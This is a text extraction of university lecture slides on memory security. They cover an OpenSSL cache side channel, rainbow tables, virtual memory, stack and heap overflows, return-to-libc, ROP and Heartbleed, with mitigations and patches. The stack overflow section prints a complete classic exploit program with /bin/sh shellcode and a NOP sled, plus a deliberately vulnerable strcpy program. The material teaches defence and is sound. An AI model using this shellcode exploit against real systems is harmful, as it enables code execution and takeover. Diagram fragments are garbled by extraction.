CS2107 Introduction to Information and System …hugh/presentations/cs2107/...Tutorial Memory issues...

TutorialMemory issues

CS2107 Introduction to Information andSystem Security

(Slide set 9)

Hugh Anderson

National University of SingaporeSchool of Computing

October, 2016

Hugh Anderson CS2107 Introduction to Information and System Security (Slide set 9)

Memory... Not yours - the computers!


Outline

1 TutorialOpenSSL side-channel attack (Feb 2014)Reversing a hash

2 Memory issuesMemory usage, memory architecture in an OSSpecific direct attacksOpenSSL Heartbeat/memory attack (April 2014)



Resources

For this lecture,from SEv2.pdf, section 4.4.

http://phrack.org/issues/49/14.html

http://www.h-online.com/security/features/A-Heap-of-Risk-747161.html





OpenSSL side-channel attack (Feb 2014)Reversing a hash

Outline




OpenSSL side channel attack

OpenSSL: An important bit of security softwareWhy?Because it is used in about 60% of all web based ssl (https) servers.As a result of this we are very interested in bugs in openssl.It may be the software most closely examined for security errors - all 700,000lines of code!

What is the (one second) attack?From the paper at http://eprint.iacr.org/2014/140.pdf .

“Our attack recovers the scalar k and thus the secret key of thesigner and would therefore allow unlimited forgeries.”

The attack is a side channel attack. An attacker can determine if code hasbeen cached or not. If it has been used, then it will be cached.

http://eprint.iacr.org/2014/140.pdf

Timing attack on a constant time function!

Simple, and the Montgommery ladder:

Q = O;foreach bit in key {

Q = 2Q;if (bit==0) {

Q = Q + P;}

}return Q;

R0 = Q;R1 = P;foreach bit in key {

if (bit==0) {R1 = R0 + R1;R0 = 2R0;

} else {R0 = R0 + R1;R1 = 2R1;

}}return R0;

Both functions return the same result, but the one on the right runs in aconstant time...OpenSSL is built with security in mind, so (of course) it uses theMontgommery ladder - the code to the right, that runs in constant time.

OpenSSL running a program

As openssl program runs, it caches the code...

...

1 nS 70nS

Program memory

Processes:

if (!gf2m_Madd(group, ...


if (!gf2m_Mdouble(group, ... } else {

if (!gf2m_Mdouble(group, ...

...

}

if (word & mask)

Instruction cache

...

...

...

CPU

OpenSSL

Attacker

is cached when

(FOR SPEED!)

Cache "lines"

Code in memory here

first used here...

If bit is a “1” THIS is cached...

if (word & mask)

Instruction cache

...

...

...

CPU

1 nS 70nS

Program memory

Processes:

...

if (!gf2m_Mdouble(group, ... } else { if (!gf2m_Madd(group, ...


}

...


OpenSSL

Attacker

C

D

...

B

A

(and the attacker can determine this by seeing how fast the four cachelinesA,B,C,D are loaded)

If bit is a “0” THIS is cached...

if (word & mask)

Instruction cache

...

...

...

CPU

1 nS 70nS

Program memory

Processes:

...

if (!gf2m_Mdouble(group, ... } else { if (!gf2m_Madd(group, ...


}

...


OpenSSL

Attacker

C

D

...

B

A

(and the attacker can determine this by seeing how fast the four cachelinesA,B,C,D are loaded)

OpenSSL timing

Original openssl-1.0.1f/crypto/ec/ec2_mult.c...if (word & mask) {

gf2m_Madd(..., x1, ...} else {

gf2m_Madd(..., x2, ...}

Each bit of a word is being tested, and depending on the bit we take twodifferent paths. The paths operate on different (code) memory locations. If aparticular path is taken, then a particular memory location would be cached,and an attacker can (afterwards) discover that, because that memory locationwould load faster. In this way an attacker can determine which path wastaken and hence the value of each bit.

Fixed openssl-1.0.1g/crypto/ec/ec2_mult.c...BN_consttime_swap(word & mask, x1, x2,...gf2m_Madd(...BN_consttime_swap(word & mask, x1, x2,...

We use a constant time swap, to put the variables in the same memorylocations.


OpenSSL side-channel attack (Feb 2014)Reversing a hash

Outline




Reversing a hash...

Precomputed tables for helping find collisions?

A precomputed table for 10character (A-Z,a-z,0-9) pass-words, might have (say) 6210 =839, 299, 365, 868, 340, 224entries, each containing a 16byte value. Thats a big disk(about 13,000,000 TB).

Indexing by hash is evenworse. We do not really havenames for disks that big.

Password (MD5) Hash

aaaaaaaa 3dbe00a1676...

aaaaaaab 2125ea8b81b...

aaaaaaac ea67f32d4e6...

aaaaaaad 746a8ab05d6...

aaaaaaae c554d695eb0...

aaaaaaaf 09eb61fd25b...

aaaaaaag 68b5af18408...

... ...

Reversing a hash: “rainbow” tables

Precompute long chains, but only keep two values

Precompute chains of val-ues starting from a pass-word guess, and usingalternate hash functionsh(p), and a reversing func-tion r(h), which gener-ates a predictable plausibleguess from the hash.

Only store the first and lastentries from the chain. Itis space efficient, and youcan re-compute the inter-mediate values (a space-time tradeoff).

Chain #1Compute:

Chain #2

h(p)

r(h)

h(p)

h(p)

h(p)

h(p)

r(h)

r(h)

r(h)

h(p)

Store:

cracyl13d

f0e377b6.. srxx21tryfedc1234..aaaaaaaaa

srxx21try

4fad6544..

asbdhdf13

aaaaaaaaa

0a224fad..

2399afb0..

mlacziryt

f0e377b6..

xyuivlzrs

d001afde..

fedc1234..

Reversing a hash: “rainbow” tables

Precompute long chains, but only keep two values

h(p)

1. Compute chain from hash

r(h)

h(p)

2. Compare candidates with chain ends

h(p)

r(h)

3. Recompute chain to reverse hash

4. Passwordasbdhdf13

aaaaaaaaa

srxx21try

srxx21try

4fad6544..

fedc1234..

f0e377b6..

d001afde..

d001afde..

cracyl13d

fedc1234..

In practice: ophcrack

The old LM windows hash


Memory usage, memory architecture in an OSSpecific direct attacksOpenSSL Heartbeat/memory attack (April 2014)

Outline




Outline of memory usage

We will...Discuss the use of computer memory in OS

Discuss storage techniques for data

Outline the properties of the stack, main memory and the heap

What is memory used for?To store programs (maybe in code or text segments).

To store data - variables, constants, strings... (in a data segment)

To store local transitory data such as return addresses when you call afunction or method, and local method variables (in the stack segment).

What do you mean...Return address?

... and what is a stack when it is at home?

How programs use memory for return addresses

Return addresses need to be nested, so we use a stack:

Stack

10 readInput() {

...

...

24 }

.. ...

.. ...

31 processItem() {

32 ...

.. ...37 }......

43 processData() {

44 ...45 processItem();46 ..... ...54 }......65 main() {66 ...67 readInput();68 ...

// Save away 46 and call processItem()

// Return to the most recent saved away address



main()

68

65

66

67

69

70

71

72

73 }

69 ...70 ...71 processData();

72 ...

73

24

...

43

44

45

46

...

readInput()

processData()

31

processItem()

37

54

Stack

Stack

Stack

// Save away 68 and call readInput()

// Save away 72 and call processData()

10

68

72 46

72

A little warning...Later, we will use stacks that are upside down, because that is howcomputers use stacks - they grow towards lower/smaller addresses.

How programs use memory for data

Storing a string will come back to haunt us...Operating systems, and many applications are written in C.

In C, a string like Hello is stored in six successive bytes, the fivecharacters, and a NULL terminating character. This allowscompact representation, and fast access to a string.In Java for contrast, a string is stored as an object. For a fivecharacter string, the storage takes up 48 bytes: An objectcontaining the actual characters; an integer offset into the array atwhich the string starts; the length of the string; and another int.This results in non-compact representation, and slow access.

When memory is needed for a program, the OS allocates memory:

The calls to access memory are malloc() and free().Java maintains its own heap, separate from the system heap.When lots of allocations and deallocations are being made, theheap may become fragmented.The OS will run a garbage collector to fix up the heap from time totime.

Memory hierarchy

For small embedded systems: one level of memoryProgram variables are next to each other in memory - no protectionbetween processes.

Primary memory (RAM/ROM) may store and retrieve values in 20nS.

For Windows/GNU+Linux: protection, and a heirarchy...Process variables in memory are not visible to other processes.

There is a heirarchy of memory:

Values in a register or cache accessed in less than 1nS,Primary/physical memory (ROM/RAM) may take 10nS to access.Secondary memory (i.e. a disk) - milliseconds access time.

Windows/GNU+Linux: virtual memory addressing

OverviewModern operating systems and hardware give each process anindividual address space - normally starting at address 0.

These addresses cannot directly map onto the same address ofreal memory, because then each process would just be seeing thesame memory.

Instead a translation unit maps this virtual address to a real physicaladdress.

It is common for a virtual address space to be the entire hardwareaddress space of the processor - that is the address range theprocessor could access using all its address lines.

Process use of memory

Virtual memory, physical memory, and translations...

prog 1

prog 2

memoryPhysical

Virtualmemory

Translations

OS kernel

The processes, and the OS kernel, each have their own view ofmemory, somehow mapped/translated to the real (physical) memory.

Virtual memory

Simple memory versus VM memory

CPU

RAM

Data Bus

0002 2

0

1

2

3

4

ROM

MMU RAM I/O #1

Lowerorder

addresslines

Table

Virtual addressPhysical address

CPU

Address

Data Bus

High

Disk

Speed

Virtual memory also allows the execution of programs that may notreside completely in memory, by using disk to act as memory.

VM systems may provide a virtual address space much larger than thephysical address space.

GNU+Linux memory allocation

3G before OS kernel v2.6, 4G afterwards

user

kernel

0x00000000

0xffffffff

0x00000000

0xffffffff

0x7fffffff0x80000000

0xbfffffff0xc0000000

4G (after v2.6)3G (before v2.6)

OS Kernel contains drivers, system stacks, page tables...

User contains executable code, libraries, stacks...

... and swap ...

Secondary storage (disk) stores memory contentsThe part of the disk used in this way is called the ’swap’ - it may beeither a

file used for the purpose, ora partition of disk.

It is common for VM systems to have a swap area two to ten times aslarge as the physical memory.

VM=paging+segments (+disk)...

The Intel CPU chip can use both segmentation and paging:

GDT

LDT

(16 bits)

0 1

index modeCS

(base) (limit)

offset

+Check limit

(32 bits)

Linear

address

Page directory Page table

Frames

dddddddddd tttttttttt oooooooooooo

Logical address

Linear

Lookup inGDT

Pagingvia tables

addressPhysicaladdress

0x002012170xc0132217cs:offset

Process view: GNU+Linux ELF format segments

Program, shared libraries, stack...

0x00000000

0x00010000

guard

Linux/ELF user memory

0xbfffffff

0x40000000

0x84000000

ma

lloc

co

de

da

ta

bss

co

de

da

ta

bss

C libraries stack

stack

Program

guard

Malloc’ed memory “above” the program...

Stack grows downwards...

Summary...

Use and architecture of memory:Memory is used to store programs, data, and the stack.

Simple memory systems are found in embedded systems (i.e. smartcards), where there is no protection of memory.

Complex memory systems manage heaps of memory for use byprograms. Java maintains its own heap.

Applications use malloc() and free() to access memory from the heap.

Larger operating systems use VM (Virtual memory):

VM may use segments (i.e. a code segment, a data segment or astack segment), andVM may use paging (i.e. memory managed in small fixed sizechunks).

Segments are protected from each other.

GNU+Linux and Windows both use paging and segments.

Remember also the swap area on disk, and page faults.



Outline




Attacks based on the computer’s memory

In all this complexity...There are many memory attacks:

Direct attacks on protected and unprotected memory systems.Direct attacks on the processor, its memory managementhardware, and the page fault system.Attacks on the disk/swap space.Attacks on the system heap, the Java heap, the garbagecollectors.Attacks on the page tables, the segment tables.

We will start with the two most well known:

Memory attack 1: Stack/Buffer overflows; how they happen, andapproaches to reduce the likelihood of an attackMemory attack 2: Heap/Buffer overflows; how they happen, andapproaches to reduce the likelihood of an attack.

Memory attack 1: stack/buffer overflow

Most well known compromise of computer systemsOne of a general class of problems caused by

software that does not check its parameters for extreme values

The attack mechanism is:

Find a program that accepts input from us (or our attackingprogram), and uses a buffera without checking bounds.Deliver EGG to it to overflow bufferOverwrite stack return address with address of OUR codeProgram then runs OUR code.

Need to examine the way programs use memory.

Presentation based on


aA buffer is just an array you are using for temporary storage.


Memory attack 1: simple program

A pretty simple program...

void main (int argc, char *argv[]) { char buffer[512]; printf ("Argument is %s\n", argv[1]); strcpy (buffer, argv[1]); }

CODE LISTING vulnerable.c

When we run it:

[hugh@pnp176-44 programs]$ ./vulnerable testArgument is test[hugh@pnp176-44 programs]$

but...

Memory attack 1: simple program

Normal operation

��

��

��

��

Stack

Stack grows down...

Return address

Buffer (512 bytes)

Computer’s Memory

Arguments

Variables

Overwrite the end of an array, with an "EGG"

��

��

��

��

Stack

Stack grows down...

Return address

Computer’s Memory

Arguments

Variables

Memory attack 1: Code creates EGG...

#include <stdlib.h> #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp (void) { __asm__ ("movl %esp,%eax"); } void main (int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE; int i; if (argc > 1) bsize = atoi (argv[1]); if (argc > 2) offset = atoi (argv[2]); if (!(buff = malloc (bsize))) { printf ("Can’t allocate memory.\n"); exit (0); } addr = get_sp () − offset; printf ("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i += 4) *(addr_ptr++) = addr; for (i = 0; i < bsize / 2; i++) buff[i] = NOP; ptr = buff + ((bsize / 2) − (strlen (shellcode) / 2)); for (i = 0; i < strlen (shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize − 1] = ’\0’; memcpy (buff, "EGG=", 4); putenv (buff); system ("/bin/bash"); }

CODE LISTING exploit3.cCODE LISTING exploit3.c

Smashing the stack - the payload!

Contents of the payload

Stack

Computer’s Memory

machine code Malicious return

address

The payload

Machine code for

the exploit

Multiple no−op Multiple copies of

Payload code for an exploit

A C program which calls a shell...

#include <stdio.h>void main() {

char *nm[2];nm[0] = "/bin/sh";nm[1] = NULL;execve(nm[0], nm, NULL);

}

movl string,string_addrmovb $0x0,null_bytemovl $0x0,null_addrmovl $0xb,%eaxmovl string,%ebxleal string,%ecxleal null_string,%edxint $0x80 // OS call“/bin/sh” string goes here.

At the left we see some C source code for running the program /bin/sh. Onthe right we see assembler code with extra OS nonsense removed.

Note that the binary code program has “zeroes” in it, andthese will have to be removed if strcpy is to copy the pro-gram onto the stack. We can use translations like:

movb $0x0,null_byte xorl %eax,%eaxmovb eax, null_byte

Using the buffer overflow attack

3 examples of situations in which we can use it1 A server (say a web server) that expects a query, and returns a

response. The demo buffer overflow attack done in class is one ofthese.

2 A CGI/ASP or perl script inside a web server3 A SUID root program on a UNIX system

Find a program that has a buffer, ... and that does notcheck its bounds. Then deliver an EGG to it to overflowthe buffer.Overwrite stack return address with address of OUR code.The program then runs OUR code.

Example attackMany attacks on Microsoft systems are based on various buffer overflowproblems. CA-2003-20 W32/Blaster worm:The W32/Blaster worm exploits a vulnerability in Microsoft’s DCOM RPCinterface as described in VU#568148 and CA-2003-16. Upon successfulexecution....

Memory attack 1: example

Consider the following scenario...

The Virtual machine running on the mac is running GNU+Linux,

VM Honeypot on Hugh’s mac

(hack from here)(Virtual) web server

Hugh’s mac

and a (cut down) version of an old version of Apache web server

Memory attack 1(a): web server code...

And in the web server we have this code:

void process(int newsockfd) {char line[512];......NEXT BIT DOESNT CHECK ARRAY SIZE! i.e. n<511while (n>0 && c!=’\n’) {

n = read (newsockfd, &c, 1);... add it to line[idx++]...

}...return;

}

The general operation of this web server is hackable...It matches our attack mechanism: A web server receives a file spec(index.html), and does not properly check a buffer that it puts the spec into.

We replace the file spec with EGG. Note that we will have to use aspecialized program to deliver the EGG (i.e. not firefox)

How to fix buffer overflows?

Find them! ... But also...Use safety technologies:

DEP: Not allowing execution of code in the stack segment (as inMacOSX/openBSD).ASLR: Address space layout randomization - randomly movingthe starting memory locations for processes. Implemented inGNU+Linux since 2005, and in Windows since 2007.Putting a value just below the return address (a canary), andchecking it before doing a return from subroutine.

It is hard to overwrite the return address without overwritingthe canary.This is standard now in Visual Studio and gcc compilers.

Use good programming practice:

Always check ranges of parameters, and be careful with arrays.man strcpy

Memory attack 1(b): return to libc!

Even with DEP: run code already in libc...

Bu

ffer

Return

address

High

Memory

This has the address of

the libc system call system().

argument to the system call...

You still need to provide an

so you get system("/bin/sh")

Memory attack 1(c): return oriented programming

Even with DEP: find code snippets, and overwrite stack...

Bu

ffer

Return

address

High

Memory

eax += ebx;

....

Resultant execution:

Code snippets

somewhere in

memory

42

212

pop eax

ret

pop ebx

ret

add eax,ebx

ret

eax = 42;

ebx = 212;

Memory attack 2: heap overflow

The younger sibling of the buffer overflowThe heap is managed by the OS as a doubly linked data structure,containing a header, and the memory to be allocated.

The attacker starts by constructing/coding something that results in theOS allocating and deallocating memory from the heap. Then:

After the malloc(), the program writes to the memory, and thenreturns it using free(). By careful choice of what we write to thememory, we can overwrite the NEXT header in the heap.The OS then merges this freed-up memory, manipulating theheaders in order to do so. It rewrites values in the previousheaders that are dependent on the values in the next headers.If the next header is modified to point to some place where areturn address is being kept, then we can run crafted code.

Background reading:http://www.h-online.com/security/features/A-Heap-of-Risk-747161.html



Consider the following part of a heap...

Backward linksForward links the heap

Chunk of free

Chunk of in−use

memory on

the heap

memory on

Chunk of in−use

memory on

the heap


The normal free() and merge...

one: free()

m[p[1]][1] is the

Note that merging

involves setting

value in p[0].

forward pointerReturn this

m[p[1]][0] is the

m[p[1]] is the heap

m[p[1]][1]

m[p[1]][0]

location that p1 points to.

p[1]

p[0]

m[p[1]][0] to have the

collection)

(garbage

the links

Then merge

backward pointer

Chunk of free

the heap

the heap

memory on

memory on

the heap

memory on

memory on

the heap

Chunk of in−use

Merged (bigger)

memory on

the heap

memory on

memory on

the heap

the heap

Chunk of free

Chunk of in−use

Chunk of free

Chunk of free

memory on

the heap

Chunk of in−use

Chunk of in−use

2 31

The OS heap management software automatically rewrites the valuesof the forward and backward links, using the values in the next links.


Consider the scenario where attacker changes pointers...

the links

Return this

one: free()

collection)

(garbage

Then merge

up now...memory on

the heap

memory on

memory on

the heap

the heap

Chunk of free

Chunk of in−use

Chunk of in−use

memory on

the heap

Chunk of in−use

memory on

the heap

memory on

memory on

the heap

the heap

Chunk of free

Chunk of in−use

Chunk of in−use

Links all messed

vector.

Later the return instruction

is done (same as in buffer

overflow), and the system starts

executing bad code.

1 2 3

return vectorAddress

of bad

code

Address of

return vector

of bad

code

Address ofThe garbage collector

writes the address of the

bad code into the returnAddress

The attacker uses the OS GC to write the address of malicious codeinto a return-address location, as for the buffer overflow.


Forms another mechanism for vectoring to code...Heap attacks have been done on both the Java and OS heaps.

An example heap attack was found in the Microsoft GDI+ WMF heapoverflow attack (2009). There were exploits of this in the wild.

According to Symantec, in the Microsoft GDI+ WMF attack:

A remote code execution vulnerability exists in the way that GDI+allocates buffer size when handling WMF image files.The vulnerability could allow remote code execution if a useropens a specially crafted WMF image file or browses to a Website that contains specially crafted content.An attacker who successfully exploited this vulnerability could takecomplete control of an affected system.An attacker could then install programs; view, change, or deletedata; or create new accounts with full user rights.Users whose accounts are configured to have fewer user rights onthe system could be less impacted than users who operate withadministrative user rights.



Outline




OpenSSL Heartbeat

What is a heartbeat in openssl?A heartbeat is a recent (February 2012) extension to TLS, to allow a client tocheck if a TLS server is still alive (rather than tearing down a connection andrenegotiating).It is described in https://tools.ietf.org/html/rfc6520.The general idea is that clients can request a heartbeat, sending aheartbeat_request message with this structure:

struct {HeartbeatMessageType type;uint16 payload_length;opaque payload[payload_length];...

} HeartbeatMessage;

The server will send back the payload in a matching heartbeat_response.

What is the issue?What if the client lied about the payload_length?

https://tools.ietf.org/html/rfc6520

OpenSSL Heartbeat, Hearts bleed

Request and response different...

OpenSSL Heartbeat

Original openssl-1.0.1f/ssl/d1_both.c.../* Read type and payload length first */

hbtype = *p++;n2s(p, payload);pl = p; ...

The original source gets the type from the record that p points to, and puts itinto hbtype. It then copies the next two bytes into the variable payload. Thisis the length of the payload, and is done without checking. The variable pl isthe actual payload, which is later echoed, using the length value without anymore checking.

Fixed openssl-1.0.1g/ssl/d1_both.c.../* Read type and payload length first */

hbtype = *p++;n2s(p, payload);if (1 + 2 + payload + 16 > s->s3->rrec.length)

return 0; /* silently discard */pl = p; ...

(There is a little more, but that is the general idea).

Summary...

The attacksOverflow attacks can be used to execute arbitrary code (that is, codethat is picked by the attacker).

This is obviously extremely dangerous.

In the case of applications or systems you build or design, the importantthing is to make sure that buffers cannot be overwritten.

However, it may be that the attacked buffer or heap is part of the OS,and not exactly your responsibility.

CS2107 Introduction to Information and System …hugh/presentations/cs2107/...Tutorial Memory issues...

Documents

Transcript of CS2107 Introduction to Information and System …hugh/presentations/cs2107/...Tutorial Memory issues...